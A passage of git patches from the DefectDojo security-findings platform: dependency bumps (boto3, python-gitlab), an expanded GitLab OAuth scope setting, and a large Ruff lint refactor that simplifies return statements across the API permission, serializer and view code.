    From 644185e108a83ba5aba381c3cd182919207d6651 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 17:14:38 -0500 Subject: [PATCH 30/62] Bump boto3 from 1.35.19 to 1.35.20 (#10922) Bumps [boto3](https://github.com/boto/boto3) from 1.35.19 to 1.35.20. - [Release notes](https://github.com/boto/boto3/releases) - [Commits](https://github.com/boto/boto3/compare/1.35.19...1.35.20) --- updated-dependencies: - dependency-name: boto3 dependency-type: direct:production update-type: version-update:semver-patch ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index 11af70433da..a1574d7db83 100644 --- a/requirements.txt +++ b/requirements.txt @@ -69,7 +69,7 @@ django-ratelimit==4.1.0 argon2-cffi==23.1.0 blackduck==1.1.3 pycurl==7.45.3 # Required for Celery Broker AWS (SQS) support -boto3==1.35.19 # Required for Celery Broker AWS (SQS) support +boto3==1.35.20 # Required for Celery Broker AWS (SQS) support netaddr==1.3.0 vulners==2.2.1 fontawesomefree==6.6.0 From c2686ef49074cd40ccf1768713e9ef2779873f89 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Mon, 16 Sep 2024 21:55:44 -0500 Subject: [PATCH 31/62] Bump python-gitlab from 4.10.0 to 4.11.1 (#10912) Bumps [python-gitlab](https://github.com/python-gitlab/python-gitlab) from 4.10.0 to 4.11.1. - [Release notes](https://github.com/python-gitlab/python-gitlab/releases) - [Changelog](https://github.com/python-gitlab/python-gitlab/blob/main/CHANGELOG.md) - [Commits](https://github.com/python-gitlab/python-gitlab/compare/v4.10.0...v4.11.1) --- updated-dependencies: - dependency-name: python-gitlab dependency-type: direct:production update-type: version-update:semver-minor ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/requirements.txt b/requirements.txt index a1574d7db83..9cc328a9f01 100644 --- a/requirements.txt +++ b/requirements.txt @@ -46,7 +46,7 @@ titlecase==2.4.1 social-auth-app-django==5.4.2 social-auth-core==4.5.4 gitpython==3.1.43 -python-gitlab==4.10.0 +python-gitlab==4.11.1 cpe==1.3.0 packageurl-python==0.15.6 django-crum==0.7.9 From b92a8d097670117021e8b22622d9eb3143a43c41 Mon Sep 17 00:00:00 2001 From: Ma1tobiose <9525648+Ma1tobiose@users.noreply.github.com> Date: Tue, 17 Sep 2024 11:09:11 +0800 Subject: [PATCH 32/62] add permission for gitlab. 
(#10880) * Update settings.dist.py * Update .settings.dist.py.sha256sum --------- Co-authored-by: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> --- dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index f2cc3bf71a1..ef21e454a65 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -5885fb4d328a6468766c17c54ae2d906511102cd9c79d86273e85fb24c95791b +0bca5a500428482976edb590b239bbbcf365b568b15ba87bda74e8a16663866d diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py index df2ed149050..6d40aeff9bb 100644 --- a/dojo/settings/settings.dist.py +++ b/dojo/settings/settings.dist.py @@ -139,7 +139,7 @@ DD_SOCIAL_AUTH_GITLAB_KEY=(str, ""), DD_SOCIAL_AUTH_GITLAB_SECRET=(str, ""), DD_SOCIAL_AUTH_GITLAB_API_URL=(str, "https://gitlab.com"), - DD_SOCIAL_AUTH_GITLAB_SCOPE=(list, ["read_user", "openid"]), + DD_SOCIAL_AUTH_GITLAB_SCOPE=(list, ["read_user", "openid", "read_api", "read_repository"]), DD_SOCIAL_AUTH_KEYCLOAK_OAUTH2_ENABLED=(bool, False), DD_SOCIAL_AUTH_KEYCLOAK_KEY=(str, ""), DD_SOCIAL_AUTH_KEYCLOAK_SECRET=(str, ""), From 22a0ffe702d6a0e067333a3926e5d6b13872f788 Mon Sep 17 00:00:00 2001 From: kiblik <5609770+kiblik@users.noreply.github.com> Date: Tue, 17 Sep 2024 17:39:47 +0200 Subject: [PATCH 33/62] Ruff: add and fix RET (#10111) * Ruff: add RET * Ruff: fix RET * move docstring --- dojo/announcement/views.py | 15 +- dojo/api_v2/mixins.py | 3 +- dojo/api_v2/permissions.py | 211 ++++++++---------- dojo/api_v2/serializers.py | 51 ++--- dojo/api_v2/views.py | 31 ++- dojo/apps.py | 3 +- dojo/authorization/authorization.py | 47 ++-- dojo/cred/queries.py | 4 +- dojo/cred/views.py | 6 +- dojo/decorators.py | 9 +- dojo/endpoint/queries.py | 8 +- dojo/endpoint/utils.py | 29 ++- dojo/endpoint/views.py | 8 +- dojo/engagement/queries.py | 4 +- dojo/engagement/views.py | 67 +++--- dojo/filters.py | 7 +- dojo/finding/queries.py | 12 +- dojo/finding/views.py | 169 +++++++------- dojo/finding_group/queries.py | 4 +- dojo/forms.py | 39 ++-- dojo/github_issue_link/views.py | 10 +- dojo/group/queries.py | 3 +- dojo/group/views.py | 28 +-- dojo/importers/auto_create_context.py | 19 +- dojo/importers/base_importer.py | 15 +- dojo/importers/default_reimporter.py | 103 ++++----- dojo/importers/endpoint_manager.py | 14 +- dojo/jira_link/helper.py | 61 +++-- dojo/jira_link/queries.py | 8 +- dojo/jira_link/views.py | 10 +- .../commands/jira_status_reconciliation.py | 3 +- dojo/metrics/utils.py | 3 +- dojo/models.py | 210 ++++++++--------- dojo/notes/views.py | 12 +- dojo/notifications/helper.py | 26 +-- dojo/notifications/views.py | 9 +- dojo/object/views.py | 17 +- dojo/pipeline.py | 28 +-- dojo/product/queries.py | 30 +-- dojo/product/views.py | 92 +++----- dojo/product_type/queries.py | 10 +- dojo/product_type/views.py | 24 +- dojo/regulations/views.py | 2 +- dojo/remote_user.py | 24 +- dojo/reports/views.py | 22 +- dojo/risk_acceptance/helper.py | 6 +- dojo/risk_acceptance/queries.py | 4 +- dojo/search/views.py | 80 +++---- dojo/sla_config/views.py | 13 +- dojo/survey/views.py | 130 +++++------ dojo/system_settings/views.py | 2 +- dojo/tags_signals.py | 1 + dojo/templatetags/display_tags.py | 43 ++-- dojo/templatetags/event_tags.py | 3 +- dojo/templatetags/get_attribute.py | 3 +- dojo/templatetags/get_banner.py | 6 +- 
dojo/templatetags/get_config_setting.py | 4 +- dojo/templatetags/get_endpoint_status.py | 3 +- dojo/templatetags/get_note_status.py | 1 + .../templatetags/get_notetype_availability.py | 4 +- dojo/test/queries.py | 8 +- dojo/test/views.py | 37 ++- dojo/tool_config/factory.py | 3 +- dojo/tool_product/queries.py | 4 +- dojo/tool_product/views.py | 3 +- dojo/tools/acunetix/parse_acunetix_xml.py | 15 +- dojo/tools/acunetix/parser.py | 3 +- dojo/tools/anchore_grype/parser.py | 8 +- dojo/tools/api_blackduck/api_client.py | 2 + dojo/tools/api_bugcrowd/api_client.py | 16 +- dojo/tools/api_bugcrowd/parser.py | 22 +- dojo/tools/api_cobalt/api_client.py | 35 ++- dojo/tools/api_cobalt/importer.py | 3 +- dojo/tools/api_cobalt/parser.py | 14 +- dojo/tools/api_edgescan/api_client.py | 5 +- dojo/tools/api_edgescan/importer.py | 3 +- dojo/tools/api_sonarqube/importer.py | 17 +- dojo/tools/api_sonarqube/updater.py | 6 +- dojo/tools/api_vulners/importer.py | 6 +- dojo/tools/appspider/parser.py | 2 +- dojo/tools/aqua/parser.py | 16 +- dojo/tools/asff/parser.py | 11 +- dojo/tools/auditjs/parser.py | 9 +- dojo/tools/aws_prowler/parser.py | 17 +- dojo/tools/aws_prowler_v3plus/parser.py | 7 +- .../parser.py | 5 +- dojo/tools/bandit/parser.py | 7 +- dojo/tools/bearer_cli/parser.py | 3 +- dojo/tools/blackduck/importer.py | 3 +- dojo/tools/blackduck/parser.py | 3 +- .../tools/blackduck_binary_analysis/parser.py | 7 +- .../blackduck_component_risk/importer.py | 5 +- dojo/tools/blackduck_component_risk/parser.py | 6 +- dojo/tools/burp_api/parser.py | 7 +- dojo/tools/burp_enterprise/parser.py | 6 +- dojo/tools/burp_graphql/parser.py | 3 +- dojo/tools/checkmarx/parser.py | 14 +- dojo/tools/checkmarx_one/parser.py | 16 +- dojo/tools/chefinspect/parser.py | 9 +- dojo/tools/clair/clairklar_parser.py | 3 +- dojo/tools/clair/parser.py | 6 +- dojo/tools/cloudsploit/parser.py | 3 +- dojo/tools/codechecker/parser.py | 7 +- dojo/tools/contrast/parser.py | 3 +- dojo/tools/crashtest_security/parser.py | 19 +- dojo/tools/crunch42/parser.py | 6 +- dojo/tools/cyclonedx/json_parser.py | 2 +- dojo/tools/cyclonedx/parser.py | 3 +- .../deepfence_threatmapper/compliance.py | 3 +- dojo/tools/deepfence_threatmapper/malware.py | 6 +- dojo/tools/deepfence_threatmapper/secret.py | 3 +- .../deepfence_threatmapper/vulnerability.py | 6 +- dojo/tools/dependency_check/parser.py | 11 +- dojo/tools/dependency_track/parser.py | 11 +- dojo/tools/dockerbench/parser.py | 4 +- dojo/tools/drheader/parser.py | 7 +- dojo/tools/eslint/parser.py | 5 +- dojo/tools/fortify/parser.py | 7 +- dojo/tools/generic/csv_parser.py | 3 +- dojo/tools/generic/parser.py | 6 +- dojo/tools/github_vulnerability/parser.py | 6 +- dojo/tools/gitlab_dep_scan/parser.py | 3 +- dojo/tools/gitlab_sast/parser.py | 3 +- dojo/tools/harbor_vulnerability/parser.py | 3 +- dojo/tools/hcl_appscan/parser.py | 3 +- dojo/tools/huskyci/parser.py | 7 +- dojo/tools/hydra/parser.py | 4 +- dojo/tools/intsights/parser.py | 3 +- .../parser.py | 6 +- dojo/tools/kubebench/parser.py | 7 +- dojo/tools/kubescape/parser.py | 7 +- dojo/tools/microfocus_webinspect/parser.py | 14 +- dojo/tools/mobsf/parser.py | 3 +- dojo/tools/mobsfscan/parser.py | 93 ++++---- dojo/tools/mozilla_observatory/parser.py | 7 +- dojo/tools/ms_defender/parser.py | 48 ++-- dojo/tools/neuvector/parser.py | 16 +- dojo/tools/neuvector_compliance/parser.py | 22 +- dojo/tools/nikto/parser.py | 7 +- dojo/tools/nmap/parser.py | 9 +- dojo/tools/noseyparker/parser.py | 4 +- dojo/tools/npm_audit/parser.py | 6 +- 
dojo/tools/npm_audit_7_plus/parser.py | 2 +- dojo/tools/nsp/parser.py | 7 +- dojo/tools/nuclei/parser.py | 2 +- dojo/tools/openvas/csv_parser.py | 5 +- dojo/tools/openvas/parser.py | 3 +- dojo/tools/openvas/xml_parser.py | 9 +- dojo/tools/ort/parser.py | 33 ++- dojo/tools/ossindex_devaudit/parser.py | 7 +- dojo/tools/php_security_audit_v2/parser.py | 7 +- .../php_symfony_security_check/parser.py | 2 +- dojo/tools/popeye/parser.py | 10 +- dojo/tools/pwn_sast/parser.py | 1 + dojo/tools/qualys/csv_parser.py | 8 +- dojo/tools/qualys/parser.py | 3 +- dojo/tools/qualys_infrascan_webgui/parser.py | 11 +- dojo/tools/qualys_webapp/parser.py | 6 +- dojo/tools/retirejs/parser.py | 4 +- dojo/tools/risk_recon/parser.py | 1 + dojo/tools/rusty_hog/parser.py | 5 +- dojo/tools/sarif/parser.py | 25 +-- dojo/tools/scout_suite/parser.py | 3 +- dojo/tools/semgrep/parser.py | 11 +- dojo/tools/snyk/parser.py | 6 +- dojo/tools/snyk_code/parser.py | 6 +- dojo/tools/sonarqube/parser.py | 27 +-- .../tools/sonarqube/sonarqube_restapi_json.py | 7 +- dojo/tools/sonarqube/soprasteria_helper.py | 17 +- dojo/tools/sonatype/parser.py | 7 +- dojo/tools/ssh_audit/parser.py | 9 +- dojo/tools/sslyze/parser.py | 7 +- dojo/tools/sslyze/parser_json.py | 8 +- dojo/tools/stackhawk/parser.py | 11 +- dojo/tools/sysdig_reports/parser.py | 5 +- dojo/tools/tenable/csv_format.py | 3 +- dojo/tools/tenable/parser.py | 7 +- dojo/tools/trivy/parser.py | 148 ++++++------ dojo/tools/trufflehog/parser.py | 8 +- dojo/tools/trustwave_fusion_api/parser.py | 7 +- dojo/tools/twistlock/parser.py | 20 +- dojo/tools/utils.py | 2 +- dojo/tools/vcg/parser.py | 19 +- dojo/tools/veracode/json_parser.py | 4 +- dojo/tools/veracode/parser.py | 7 +- dojo/tools/veracode/xml_parser.py | 3 +- dojo/tools/veracode_sca/parser.py | 9 +- dojo/tools/wapiti/parser.py | 3 +- dojo/tools/wfuzz/parser.py | 7 +- dojo/tools/whitehat_sentinel/parser.py | 4 +- dojo/tools/wiz/parser.py | 5 +- dojo/tools/xanitizer/parser.py | 5 +- dojo/tools/yarn_audit/parser.py | 7 +- dojo/user/utils.py | 29 +-- dojo/user/validators.py | 21 +- dojo/user/views.py | 11 +- dojo/utils.py | 77 +++---- ruff.toml | 1 + tests/product_test.py | 3 +- unittests/dojo_test_case.py | 15 +- unittests/test_apply_finding_template.py | 12 +- unittests/test_import_reimport.py | 7 +- unittests/test_rest_framework.py | 25 ++- .../tools/test_api_sonarqube_importer.py | 27 +-- unittests/tools/test_api_sonarqube_parser.py | 12 +- 205 files changed, 1438 insertions(+), 1929 deletions(-) diff --git a/dojo/announcement/views.py b/dojo/announcement/views.py index 6b0cb16bc3c..26160c3236b 100644 --- a/dojo/announcement/views.py +++ b/dojo/announcement/views.py @@ -81,12 +81,11 @@ def dismiss_announcement(request): extra_tags="alert-success", ) return HttpResponseRedirect("dashboard") - else: - messages.add_message( - request, - messages.ERROR, - _("Failed to remove announcement."), - extra_tags="alert-danger", - ) - return render(request, "dojo/dismiss_announcement.html") + messages.add_message( + request, + messages.ERROR, + _("Failed to remove announcement."), + extra_tags="alert-danger", + ) + return render(request, "dojo/dismiss_announcement.html") return render(request, "dojo/dismiss_announcement.html") diff --git a/dojo/api_v2/mixins.py b/dojo/api_v2/mixins.py index e32683c3742..6c6b4792757 100644 --- a/dojo/api_v2/mixins.py +++ b/dojo/api_v2/mixins.py @@ -29,8 +29,7 @@ def delete_preview(self, request, pk=None): def flatten(elem): if isinstance(elem, list): return itertools.chain.from_iterable(map(flatten, elem)) - 
else: - return [elem] + return [elem] rels = [ { diff --git a/dojo/api_v2/permissions.py b/dojo/api_v2/permissions.py index f7669826830..fe508c92b1b 100644 --- a/dojo/api_v2/permissions.py +++ b/dojo/api_v2/permissions.py @@ -35,8 +35,7 @@ def check_post_permission(request, post_model, post_pk, post_permission): raise ParseError(msg) object = get_object_or_404(post_model, pk=request.data.get(post_pk)) return user_has_permission(request.user, object, post_permission) - else: - return True + return True def check_object_permission( @@ -49,14 +48,13 @@ def check_object_permission( ): if request.method == "GET": return user_has_permission(request.user, object, get_permission) - elif request.method == "PUT" or request.method == "PATCH": + if request.method == "PUT" or request.method == "PATCH": return user_has_permission(request.user, object, put_permission) - elif request.method == "DELETE": + if request.method == "DELETE": return user_has_permission(request.user, object, delete_permission) - elif request.method == "POST": + if request.method == "POST": return user_has_permission(request.user, object, post_permission) - else: - return False + return False class UserHasAppAnalysisPermission(permissions.BasePermission): @@ -113,12 +111,11 @@ def has_permission(self, request, view): return user_has_configuration_permission( request.user, "auth.view_group", ) - elif request.method == "POST": + if request.method == "POST": return user_has_configuration_permission( request.user, "auth.add_group", ) - else: - return True + return True def has_object_permission(self, request, view, obj): if request.method == "GET": @@ -130,14 +127,13 @@ def has_object_permission(self, request, view, obj): ) and user_has_permission( request.user, obj, Permissions.Group_View, ) - else: - return check_object_permission( - request, - obj, - Permissions.Group_View, - Permissions.Group_Edit, - Permissions.Group_Delete, - ) + return check_object_permission( + request, + obj, + Permissions.Group_View, + Permissions.Group_Edit, + Permissions.Group_Delete, + ) class UserHasDojoGroupMemberPermission(permissions.BasePermission): @@ -188,8 +184,7 @@ def has_permission(self, request, view): ) ) return has_permission_result - else: - return True + return True def has_object_permission(self, request, view, obj): has_permission_result = True @@ -293,9 +288,8 @@ def has_permission(self, request, view): return check_post_permission( request, Product, "product", Permissions.Engagement_Add, ) - else: - # related object only need object permission - return True + # related object only need object permission + return True def has_object_permission(self, request, view, obj): if UserHasEngagementPermission.path_engagement_post.match( @@ -308,15 +302,14 @@ def has_object_permission(self, request, view, obj): Permissions.Engagement_Edit, Permissions.Engagement_Delete, ) - else: - return check_object_permission( - request, - obj, - Permissions.Engagement_View, - Permissions.Engagement_Edit, - Permissions.Engagement_Edit, - Permissions.Engagement_Edit, - ) + return check_object_permission( + request, + obj, + Permissions.Engagement_View, + Permissions.Engagement_Edit, + Permissions.Engagement_Edit, + Permissions.Engagement_Edit, + ) class UserHasRiskAcceptancePermission(permissions.BasePermission): @@ -334,9 +327,8 @@ def has_permission(self, request, view): return check_post_permission( request, Product, "product", Permissions.Risk_Acceptance, ) - else: - # related object only need object permission - return True + # related object only need 
object permission + return True def has_object_permission(self, request, view, obj): if UserHasRiskAcceptancePermission.path_risk_acceptance_post.match( @@ -351,15 +343,14 @@ def has_object_permission(self, request, view, obj): Permissions.Risk_Acceptance, Permissions.Risk_Acceptance, ) - else: - return check_object_permission( - request, - obj, - Permissions.Risk_Acceptance, - Permissions.Risk_Acceptance, - Permissions.Risk_Acceptance, - Permissions.Risk_Acceptance, - ) + return check_object_permission( + request, + obj, + Permissions.Risk_Acceptance, + Permissions.Risk_Acceptance, + Permissions.Risk_Acceptance, + Permissions.Risk_Acceptance, + ) class UserHasFindingPermission(permissions.BasePermission): @@ -382,9 +373,8 @@ def has_permission(self, request, view): return check_post_permission( request, Test, "test", Permissions.Finding_Add, ) - else: - # related object only need object permission - return True + # related object only need object permission + return True def has_object_permission(self, request, view, obj): if ( @@ -402,15 +392,14 @@ def has_object_permission(self, request, view, obj): Permissions.Finding_Edit, Permissions.Finding_Delete, ) - else: - return check_object_permission( - request, - obj, - Permissions.Finding_View, - Permissions.Finding_Edit, - Permissions.Finding_Edit, - Permissions.Finding_Edit, - ) + return check_object_permission( + request, + obj, + Permissions.Finding_View, + Permissions.Finding_Edit, + Permissions.Finding_Edit, + Permissions.Finding_Edit, + ) class UserHasImportPermission(permissions.BasePermission): @@ -435,7 +424,7 @@ def has_permission(self, request, view): return user_has_permission( request.user, engagement, Permissions.Import_Scan_Result, ) - elif engagement_id := converted_dict.get("engagement_id"): + if engagement_id := converted_dict.get("engagement_id"): # engagement_id doesn't exist msg = f'Engagement "{engagement_id}" does not exist' raise serializers.ValidationError(msg) @@ -452,19 +441,19 @@ def has_permission(self, request, view): converted_dict.get("product_type"), "Need engagement_id or product_name + engagement_name to perform import", ) - else: - # the engagement doesn't exist, so we need to check if the user has - # requested and is allowed to use auto_create - return check_auto_create_permission( - request.user, - converted_dict.get("product"), - converted_dict.get("product_name"), - converted_dict.get("engagement"), - converted_dict.get("engagement_name"), - converted_dict.get("product_type"), - converted_dict.get("product_type_name"), - "Need engagement_id or product_name + engagement_name to perform import", - ) + return None + # the engagement doesn't exist, so we need to check if the user has + # requested and is allowed to use auto_create + return check_auto_create_permission( + request.user, + converted_dict.get("product"), + converted_dict.get("product_name"), + converted_dict.get("engagement"), + converted_dict.get("engagement_name"), + converted_dict.get("product_type"), + converted_dict.get("product_type_name"), + "Need engagement_id or product_name + engagement_name to perform import", + ) class UserHasMetaImportPermission(permissions.BasePermission): @@ -490,13 +479,12 @@ def has_permission(self, request, view): return user_has_permission( request.user, product, Permissions.Import_Scan_Result, ) - elif product_id := converted_dict.get("product_id"): + if product_id := converted_dict.get("product_id"): # product_id doesn't exist msg = f'Product "{product_id}" does not exist' raise 
serializers.ValidationError(msg) - else: - msg = "Need product_id or product_name to perform import" - raise serializers.ValidationError(msg) + msg = "Need product_id or product_name to perform import" + raise serializers.ValidationError(msg) class UserHasProductPermission(permissions.BasePermission): @@ -556,8 +544,7 @@ def has_permission(self, request, view): return user_has_global_permission( request.user, Permissions.Product_Type_Add, ) - else: - return True + return True def has_object_permission(self, request, view, obj): return check_object_permission( @@ -631,7 +618,7 @@ def has_permission(self, request, view): return user_has_permission( request.user, test, Permissions.Import_Scan_Result, ) - elif test_id := converted_dict.get("test_id"): + if test_id := converted_dict.get("test_id"): # test_id doesn't exist msg = f'Test "{test_id}" does not exist' raise serializers.ValidationError(msg) @@ -648,19 +635,19 @@ def has_permission(self, request, view): converted_dict.get("product_type"), "Need test_id or product_name + engagement_name + scan_type to perform reimport", ) - else: - # the test doesn't exist, so we need to check if the user has - # requested and is allowed to use auto_create - return check_auto_create_permission( - request.user, - converted_dict.get("product"), - converted_dict.get("product_name"), - converted_dict.get("engagement"), - converted_dict.get("engagement_name"), - converted_dict.get("product_type"), - converted_dict.get("product_type_name"), - "Need test_id or product_name + engagement_name + scan_type to perform reimport", - ) + return None + # the test doesn't exist, so we need to check if the user has + # requested and is allowed to use auto_create + return check_auto_create_permission( + request.user, + converted_dict.get("product"), + converted_dict.get("product_name"), + converted_dict.get("engagement"), + converted_dict.get("engagement_name"), + converted_dict.get("product_type"), + converted_dict.get("product_type_name"), + "Need test_id or product_name + engagement_name + scan_type to perform reimport", + ) class UserHasTestPermission(permissions.BasePermission): @@ -676,9 +663,8 @@ def has_permission(self, request, view): return check_post_permission( request, Engagement, "engagement", Permissions.Test_Add, ) - else: - # related object only need object permission - return True + # related object only need object permission + return True def has_object_permission(self, request, view, obj): if UserHasTestPermission.path_tests_post.match( @@ -691,15 +677,14 @@ def has_object_permission(self, request, view, obj): Permissions.Test_Edit, Permissions.Test_Delete, ) - else: - return check_object_permission( - request, - obj, - Permissions.Test_View, - Permissions.Test_Edit, - Permissions.Test_Edit, - Permissions.Test_Edit, - ) + return check_object_permission( + request, + obj, + Permissions.Test_View, + Permissions.Test_Edit, + Permissions.Test_Edit, + Permissions.Test_Edit, + ) class UserHasTestImportPermission(permissions.BasePermission): @@ -776,8 +761,7 @@ def has_permission(self, request, view): ) ) return has_permission_result - else: - return True + return True def has_object_permission(self, request, view, obj): has_permission_result = True @@ -840,8 +824,7 @@ def has_permission(self, request, view): ) ) return has_permission_result - else: - return True + return True def has_object_permission(self, request, view, obj): has_permission_result = True @@ -934,9 +917,8 @@ def raise_no_auto_create_import_validation_error( if product_type_name: msg = 
f'Product "{product_name}" does not exist in Product_Type "{product_type_name}"' raise serializers.ValidationError(msg) - else: - msg = f'Product "{product_name}" does not exist' - raise serializers.ValidationError(msg) + msg = f'Product "{product_name}" does not exist' + raise serializers.ValidationError(msg) if engagement_name and not engagement: msg = f'Engagement "{engagement_name}" does not exist in Product "{product_name}"' @@ -1021,12 +1003,11 @@ def check_auto_create_permission( # new product type can be created with current user as owner, so # all objects in it can be created as well return True - else: - if not user_has_permission( - user, product_type, Permissions.Product_Type_Add_Product, - ): - msg = f'No permission to create products in product_type "{product_type}"' - raise PermissionDenied(msg) + if not user_has_permission( + user, product_type, Permissions.Product_Type_Add_Product, + ): + msg = f'No permission to create products in product_type "{product_type}"' + raise PermissionDenied(msg) # product can be created, so objects in it can be created as well return True diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py index dc8acb40285..87ea0003d49 100644 --- a/dojo/api_v2/serializers.py +++ b/dojo/api_v2/serializers.py @@ -227,9 +227,7 @@ def to_internal_value(self, data): substrings = re.findall(r'(?:"[^"]*"|[^",]+)', s) data_safe.extend(substrings) - internal_value = tagulous.utils.render_tags(data_safe) - - return internal_value + return tagulous.utils.render_tags(data_safe) def to_representation(self, value): if not isinstance(value, list): @@ -305,8 +303,7 @@ def __str__(self): return json.dumps( self, sort_keys=True, indent=4, separators=(",", ": "), ) - else: - return json.dumps(self) + return json.dumps(self) class RequestResponseSerializerField(serializers.ListSerializer): @@ -556,8 +553,7 @@ def validate(self, data): ): msg = "Update of password though API is not allowed" raise ValidationError(msg) - else: - return super().validate(data) + return super().validate(data) class UserContactInfoSerializer(serializers.ModelSerializer): @@ -822,6 +818,7 @@ def validate(self, data): ) raise ValidationError(msg) return data + return None class RawFileSerializer(serializers.ModelSerializer): @@ -1074,8 +1071,7 @@ def to_representation(self, data): "title": file.title, }, ) - new_data = {"engagement_id": engagement.id, "files": new_files} - return new_data + return {"engagement_id": engagement.id, "files": new_files} class EngagementCheckListSerializer(serializers.ModelSerializer): @@ -1147,8 +1143,7 @@ def run_validators(self, initial_data): if "finding, endpoint must make a unique set" in str(exc): msg = "This endpoint-finding relation already exists" raise serializers.ValidationError(msg) from exc - else: - raise + raise def create(self, validated_data): endpoint = validated_data.get("endpoint") @@ -1161,8 +1156,7 @@ def create(self, validated_data): if "finding, endpoint must make a unique set" in str(ie): msg = "This endpoint-finding relation already exists" raise serializers.ValidationError(msg) - else: - raise + raise status.mitigated = validated_data.get("mitigated", False) status.false_positive = validated_data.get("false_positive", False) status.out_of_scope = validated_data.get("out_of_scope", False) @@ -1178,8 +1172,7 @@ def update(self, instance, validated_data): if "finding, endpoint must make a unique set" in str(ie): msg = "This endpoint-finding relation already exists" raise serializers.ValidationError(msg) - else: - raise + raise class 
EndpointSerializer(TaggitSerializer, serializers.ModelSerializer): @@ -1440,8 +1433,7 @@ def to_representation(self, data): "title": file.title, }, ) - new_data = {"test_id": test.id, "files": new_files} - return new_data + return {"test_id": test.id, "files": new_files} class TestImportFindingActionSerializer(serializers.ModelSerializer): @@ -1697,8 +1689,7 @@ def get_related_fields(self, obj): return FindingRelatedFieldsSerializer( required=False, ).to_representation(obj) - else: - return None + return None def get_display_status(self, obj) -> str: return obj.status() @@ -1742,8 +1733,7 @@ def update(self, instance, validated_data): # not sure why we are returning a tag_object, but don't want to change # too much now as we're just fixing a bug - tag_object = self._save_tags(instance, to_be_tagged) - return tag_object + return self._save_tags(instance, to_be_tagged) def validate(self, data): if self.context["request"].method == "PATCH": @@ -1879,8 +1869,7 @@ def create(self, validated_data): # not sure why we are returning a tag_object, but don't want to change # too much now as we're just fixing a bug - tag_object = self._save_tags(new_finding, to_be_tagged) - return tag_object + return self._save_tags(new_finding, to_be_tagged) def validate(self, data): if "reporter" not in data: @@ -2796,8 +2785,7 @@ def to_representation(self, data): "title": file.title, }, ) - new_data = {"finding_id": finding.id, "files": new_files} - return new_data + return {"finding_id": finding.id, "files": new_files} class FindingCloseSerializer(serializers.ModelSerializer): @@ -3054,10 +3042,9 @@ class QuestionnaireQuestionSerializer(serializers.ModelSerializer): def to_representation(self, instance): if isinstance(instance, TextQuestion): return TextQuestionSerializer(instance=instance).data - elif isinstance(instance, ChoiceQuestion): + if isinstance(instance, ChoiceQuestion): return ChoiceQuestionSerializer(instance=instance).data - else: - return QuestionSerializer(instance=instance).data + return QuestionSerializer(instance=instance).data class Meta: model = Question @@ -3094,10 +3081,9 @@ class QuestionnaireAnswerSerializer(serializers.ModelSerializer): def to_representation(self, instance): if isinstance(instance, TextAnswer): return TextAnswerSerializer(instance=instance).data - elif isinstance(instance, ChoiceAnswer): + if isinstance(instance, ChoiceAnswer): return ChoiceAnswerSerializer(instance=instance).data - else: - return AnswerSerializer(instance=instance).data + return AnswerSerializer(instance=instance).data class Meta: model = Answer @@ -3171,8 +3157,7 @@ def create(self, validated_data): if 'duplicate key value violates unique constraint "dojo_announcement_pkey"' in str(e): msg = "No more than one Announcement is allowed" raise serializers.ValidationError(msg) - else: - raise + raise class NotificationWebhooksSerializer(serializers.ModelSerializer): diff --git a/dojo/api_v2/views.py b/dojo/api_v2/views.py index 7ae9925479a..ae77e923553 100644 --- a/dojo/api_v2/views.py +++ b/dojo/api_v2/views.py @@ -879,8 +879,7 @@ def get_queryset(self): def get_serializer_class(self): if self.request and self.request.method == "POST": return serializers.FindingCreateSerializer - else: - return serializers.FindingSerializer + return serializers.FindingSerializer @extend_schema( methods=["POST"], @@ -1227,10 +1226,9 @@ def remove_tags(self, request, pk=None): {"success": "Tag(s) Removed"}, status=status.HTTP_204_NO_CONTENT, ) - else: - return Response( - delete_tags.errors, 
status=status.HTTP_400_BAD_REQUEST, - ) + return Response( + delete_tags.errors, status=status.HTTP_400_BAD_REQUEST, + ) @extend_schema( responses={ @@ -1368,10 +1366,9 @@ def _add_metadata(self, request, finding): ) return Response(data=metadata_data.data, status=status.HTTP_200_OK) - else: - return Response( - metadata_data.errors, status=status.HTTP_400_BAD_REQUEST, - ) + return Response( + metadata_data.errors, status=status.HTTP_400_BAD_REQUEST, + ) def _remove_metadata(self, request, finding): name = request.query_params.get("name", None) @@ -1458,13 +1455,13 @@ def metadata(self, request, pk=None): if request.method == "GET": return self._get_metadata(request, finding) - elif request.method == "POST": + if request.method == "POST": return self._add_metadata(request, finding) - elif request.method == "PUT": + if request.method == "PUT": return self._edit_metadata(request, finding) - elif request.method == "PATCH": + if request.method == "PATCH": return self._edit_metadata(request, finding) - elif request.method == "DELETE": + if request.method == "DELETE": return self._remove_metadata(request, finding) return Response( @@ -2092,8 +2089,7 @@ def get_queryset(self): def get_serializer_class(self): if self.request and self.request.method == "POST": return serializers.StubFindingCreateSerializer - else: - return serializers.StubFindingSerializer + return serializers.StubFindingSerializer # Authorization: authenticated, configuration @@ -2145,8 +2141,7 @@ def get_serializer_class(self): if self.action == "accept_risks": return ra_api.AcceptedRiskSerializer return serializers.TestCreateSerializer - else: - return serializers.TestSerializer + return serializers.TestSerializer @extend_schema( request=serializers.ReportGenerateOptionSerializer, diff --git a/dojo/apps.py b/dojo/apps.py index e7a39ab5433..fd3a06575fd 100644 --- a/dojo/apps.py +++ b/dojo/apps.py @@ -92,8 +92,7 @@ def get_model_fields_with_extra(model, extra_fields=()): def get_model_fields(default_fields, 